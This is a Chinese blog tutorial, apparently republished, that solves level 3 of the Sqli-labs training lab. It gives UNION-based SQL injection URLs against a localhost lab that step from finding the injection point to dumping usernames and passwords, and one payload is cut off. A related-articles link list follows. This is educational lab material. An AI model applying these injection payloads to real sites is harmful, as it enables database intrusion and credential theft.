Sqli-labs 3
时间:2021-08-23
本文章向大家介绍Sqli-labs 3,主要包括Sqli-labs 3使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
1.找注入点
这一关的名字叫做 quotes with twist ,扭曲的引号,为什么这么说呢,
我们先来看看测试报错,后面加上双引号,可以看到没报错
后面加上' 报错,这里不注意看这个报错信息的话,找到注入点直接上payload会发现还是报错
这里就出现所谓的扭曲了,注意看报错返回的),括号,在sql语法中加入了(),对传入参数$id的引用
来看看源码,果然是有括号的
2.构造payload
接下来就可以根据这点来构造payload了,之前我们已经知道他查询是3个字段了,就不在从头开始探查了
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,2,3 --+
爆数据库名
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,database(),(select group_concat(schema_name) from
爆表名
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(table_name) from information_schema.tables where table_schema = "security") --+
爆字段
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(column_name) from information_schema.columns where table_name = "users") --+
爆数据
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(username,0x3a,password) from users ) --+
最关键的还是要找到注入点和绕过方式~~
原文地址:https://www.cnblogs.com/byErichas/p/15174641.html
- IBatisNet基础组件
- 学习altas笔记[客户端JS和Altas环境初始化关系和DataTable返回数据的客户端处理]
- 在Windows 8 Hyper-V下的安装CentOS 6和SSH配置
- WordPress RSS Feed 优化/设置技巧六则
- SourceTree 基本介绍
- 学习Altas 笔记[JS简单调用服务端方法]
- 使用WinSCP软件在windows和Linux中进行文件传输
- 线程安全的Generic Dictionary
- Python 项目实践三(Web应用程序)第五篇
- CentOS 6.3下 安装 Mono 3.2 和Jexus 5.4
- Python 项目实践三(Web应用程序)第四篇
- 负载均衡环境下缓存处理
- WordPress Ajax 异步加载 自定义评论表情
- “分期网”域名fenqi.wang以16888元成交
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Qt官方示例-K线图
- 一个快速构造GAN的教程:如何用pytorch构造DCGAN
- 从0到1开发测试平台(八)后端服务添加lombok第三方类库
- 【CSS】470- 是时候开始用 CSS 自定义属性了
- 一个安卓App,如何成为DuerOS 上的技能应用呢?
- 什么是SPU、SKU、SKC、ARPU
- C++判断类型的模板
- 强化学习/增强学习/再励学习介绍 | 深度学习 | 干货分享 | 解读技术
- Spring Security 初始化流程梳理
- 聊聊dubbo-go的kubernetesRegistry
- QMake复制文件/目录方法
- 计算FPS小例子
- 解读技术 |学习率及其如何改善深度学习算法
- MySQL 5.7 新特性:Generated Column
- 聊聊dubbo-go的nacosRegistry